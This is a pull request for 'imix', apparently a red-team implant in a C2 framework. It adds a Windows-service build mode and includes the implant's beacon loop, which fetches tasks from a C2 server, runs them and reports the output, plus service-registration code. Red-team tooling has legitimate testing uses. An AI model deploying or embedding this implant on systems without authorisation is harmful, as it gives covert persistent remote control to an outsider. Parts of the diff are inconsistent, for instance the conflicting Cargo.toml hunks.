### PR TITLE
375 allow imix to compile to a windows service

### DIFF
--- a/docs/_docs/user-guide/imix.md
+++ b/docs/_docs/user-guide/imix.md
@@ -94,4 +94,8 @@ apt update
 sudo apt install gcc-mingw-w64
 
 RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target=x86_64-pc-windows-gnu
+
+# Compile windows service exe
+RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --features win_service --target=x86_64-pc-windows-gnu
 ```
+_The windows service exe can also be executed as a standard exe. So if you only want on binary build a service exe and reuse it._

--- a/implants/Cargo.toml
+++ b/implants/Cargo.toml
@@ -73,6 +73,7 @@ which = "4.4.2"
 whoami = "1.3.0"
 windows-sys = "0.45.0"
 winreg = "0.51.0"
+windows-service = "0.6.0"
 
 [profile.release]
 strip = true  # Automatically strip symbols from the binary.

--- a/implants/imix/Cargo.toml
+++ b/implants/imix/Cargo.toml
@@ -4,8 +4,8 @@ version = "0.0.3"
 edition = "2021"
 
 [features]
-service = []
-default = ["service"]
+win_service = []
+default = []
 
 [dependencies]
 anyhow = { workspace = true }
@@ -28,7 +28,7 @@ uuid = { workspace = true, features = ["v4","fast-rng"] }
 whoami = { workspace = true }
 
 [target.'cfg(windows)'.dependencies]
-windows-service = "0.6.0"
+windows-service = { workspace = true }
 
 [dev-dependencies]
 httptest = { workspace = true }

--- a/implants/imix/Cargo.toml
+++ b/implants/imix/Cargo.toml
@@ -3,6 +3,10 @@ name = "imix"
 version = "0.0.3"
 edition = "2021"
 
+[features]
+service = []
+default = ["service"]
+
 [dependencies]
 anyhow = { workspace = true }
 chrono = { workspace = true , features = ["serde"] }
@@ -22,6 +26,9 @@ tonic = { workspace = true }
 tokio = { workspace = true, features = ["full"] }
 uuid = { workspace = true, features = ["v4","fast-rng"] }
 whoami = { workspace = true }
+
+[target.'cfg(windows)'.dependencies]
+windows-service = "0.6.0"
 
 [dev-dependencies]
 httptest = { workspace = true }

--- a/implants/imix/src/lib.rs
+++ b/implants/imix/src/lib.rs
@@ -1,8 +1,20 @@
+use std::{collections::HashMap, ffi::OsString, time::Instant};
+
+use anyhow::Result;
+use c2::pb::{c2_client::C2Client, TaskOutput};
+use clap::{arg, Command};
+use exec::AsyncTask;
+use init::agent_init;
 use serde::{Deserialize, Serialize};
+
+use crate::tasks::{start_new_tasks, submit_task_output};
 
 pub mod exec;
 pub mod init;
 pub mod tasks;
+
+#[cfg(win_service)]
+pub mod win_service;
 
 #[derive(Debug)]
 pub enum Error {
@@ -52,3 +64,169 @@ pub struct Config {
 }
 
 pub type TaskID = i64;
+
+fn get_callback_uri(imix_config: Config) -> Result<String> {
+    Ok(imix_config.callback_config.c2_configs[0].uri.clone())
+}
+
+// Async handler for port scanning.
+pub async fn main_loop(config_path: String, loop_count_max: Option<i32>) -> Result<()> {
+    #[cfg(debug_assertions)]
+    let mut debug_loop_count: i32 = 0;
+
+    // This hashmap tracks all tasks by their ID (key) and a tuple value: (future, channel_reciever)
+    // AKA Work queue
+    let mut all_exec_futures: HashMap<TaskID, AsyncTask> = HashMap::new();
+    // This hashmap tracks all tasks output
+    // AKA Results queue
+    let mut all_task_res_map: HashMap<TaskID, Vec<TaskOutput>> = HashMap::new();
+
+    let host_id_file = if cfg!(target_os = "windows") {
+        "C:\\ProgramData\\system-id"
+    } else {
+        "/etc/system-id"
+    }
+    .to_string();
+
+    let (agent_properties, imix_config) = agent_init(config_path, host_id_file)?;
+
+    loop {
+        // @TODO: Why two timers?
+
+        // 0. Get loop start time
+        let loop_start_time = Instant::now();
+
+        #[cfg(debug_assertions)]
+        eprintln!("Get new tasks");
+
+        // 1. Pull down new tasks
+        // 1a) calculate callback uri
+        let cur_callback_uri = get_callback_uri(imix_config.clone())?;
+
+        // 1b) Setup the tavern client
+        let tavern_client = match C2Client::connect(cur_callback_uri.clone()).await {
+            Ok(tavern_client_local) => tavern_client_local,
+            Err(err) => {
+                #[cfg(debug_assertions)]
+                eprintln!("failed to create tavern client {}", err);
+                continue;
+            }
+        };
+
+        // 1c) Collect new tasks
+        #[cfg(debug_assertions)]
+        eprintln!(
+            "[{}]: collecting tasks",
+            (Instant::now() - loop_start_time).as_millis()
+        );
+
+        let new_tasks = tasks::get_new_tasks(
+            agent_properties.clone(),
+            imix_config.clone(),
+            tavern_client.clone(),
+        )
+        .await?;
+
+        // 2. Start new tasks
+        #[cfg(debug_assertions)]
+        eprintln!(
+            "[{}]: Starting {} new tasks",
+            (Instant::now() - loop_start_time).as_millis(),
+            new_tasks.len()
+        );
+
+        start_new_tasks(new_tasks, &mut all_exec_futures, loop_start_time).await?;
+
+        // 3. Sleep till callback time
+        let time_to_sleep = imix_config
+            .clone()
+            .callback_config
+            .interval
+            .checked_sub(loop_start_time.elapsed().as_secs())
+            .unwrap_or_else(|| 0);
+
+        #[cfg(debug_assertions)]
+        eprintln!(
+            "[{}]: Sleeping seconds {}",
+            (Instant::now() - loop_start_time).as_millis(),
+            time_to_sleep
+        );
+
+        std::thread::sleep(std::time::Duration::new(time_to_sleep as u64, 24601)); // This just sleeps our thread.
+
+        // Check status & send response
+        #[cfg(debug_assertions)]
+        eprintln!(
+            "[{}]: Checking task status",
+            (Instant::now() - loop_start_time).as_millis()
+        );
+
+        // Update running tasks and results
+        submit_task_output(
+            loop_start_time,
+            tavern_client,
+            &mut all_exec_futures,
+            &mut all_task_res_map,
+        )
+        .await?;
+
+        // Debug loop tracker
+        #[cfg(debug_assertions)]
+        if let Some(count_max) = loop_count_max {
+            debug_loop_count += 1;
+            if debug_loop_count >= count_max {
+                return Ok(());
+            }
+        }
+    }
+}
+
+pub fn standard_main(arguments: Option<Vec<OsString>>) -> Result<()> {
+    let cmd = Command::new("imix")
+        .arg(
+            arg!(
+                -c --config <FILE> "Sets a custom config file"
+            )
+            .required(false),
+        )
+        .subcommand(
+            Command::new("install").about("Run in install mode").arg(
+                arg!(
+                    -c --config <FILE> "Sets a custom config file"
+                )
+                .required(true),
+            ),
+        );
+    // .get_matches();
+    let matches = match arguments {
+        Some(local_arguments) => cmd.try_get_matches_from(local_arguments)?,
+        None => cmd.get_matches(),
+    };
+
+    match matches.subcommand() {
+        Some(("install", args)) => {
+            let _config_path = args.value_of("config").unwrap();
+            unimplemented!("Install isn't implemented yet")
+        }
+        _ => {}
+    }
+
+    let runtime = tokio::runtime::Builder::new_multi_thread()
+        .worker_threads(128)
+        .enable_all()
+        .build()
+        .unwrap();
+
+    if let Some(config_path) = matches.value_of("config") {
+        match runtime.block_on(main_loop(config_path.to_string(), None)) {
+            Ok(_) => {}
+            Err(error) => eprintln!(
+                "Imix main_loop exited unexpectedly with config: {}\n{}",
+                config_path.to_string(),
+                error
+            ),
+        }
+    } else {
+    }
+    Ok(())
+}

--- a/implants/imix/src/win_service.rs
+++ b/implants/imix/src/win_service.rs
@@ -1,0 +1,63 @@
+use std::{ffi::OsString, time::Duration};
+
+fn run_service() -> windows_service::Result<()> {
+    use windows_service::{
+        service::{
+            ServiceControl, ServiceControlAccept, ServiceExitCode, ServiceState, ServiceStatus,
+            ServiceType,
+        },
+        service_control_handler::{self, ServiceControlHandlerResult},
+    };
+
+    let event_handler = move |control_event| -> ServiceControlHandlerResult {
+        match control_event {
+            ServiceControl::Stop | ServiceControl::Interrogate => {
+                ServiceControlHandlerResult::NoError
+            }
+            _ => ServiceControlHandlerResult::NotImplemented,
+        }
+    };
+
+    // Register system service event handler
+    let status_handle = service_control_handler::register("my_service_name", event_handler)?;
+
+    let next_status = ServiceStatus {
+        // Should match the one from system service registry
+        service_type: ServiceType::OWN_PROCESS,
+        // The new state
+        current_state: ServiceState::Running,
+        // Accept stop events when running
+        controls_accepted: ServiceControlAccept::STOP,
+        // Used to report an error when starting or stopping only, otherwise must be zero
+        exit_code: ServiceExitCode::Win32(0),
+        // Only used for pending states, otherwise must be zero
+        checkpoint: 0,
+        // Only used for pending states, otherwise must be zero
+        wait_hint: Duration::default(),
+        process_id: None,
+    };
+
+    // Tell the system that the service is running now
+    status_handle.set_service_status(next_status)?;
+    Ok(())
+}
+
+pub fn service_main(arguments: Vec<OsString>) {
+    match run_service() {
+        Ok(_) => {}
+        Err(_local_err) => {
+            #[cfg(debug_assertions)]
+            eprintln!("Failed to start service: {}", _local_err.to_string());
+        }
+    }
+
+    match crate::standard_main(Some(arguments)) {
+        Ok(_) => {}
+        Err(_local_err) => {
+            #[cfg(debug_assertions)]
+            eprintln!("Failed to start imix: {}", _local_err);
+        }
+    }
+
+    return;
+}


### PR DESCRIPTION
#### What type of PR is this?
/kind feature

#### What this PR does / why we need it:
Allows imix to be compiled as a windows service executable.
Introduces the `--features win_service` feature flag during compilation.

#### Which issue(s) this PR fixes:
Fixes #375 
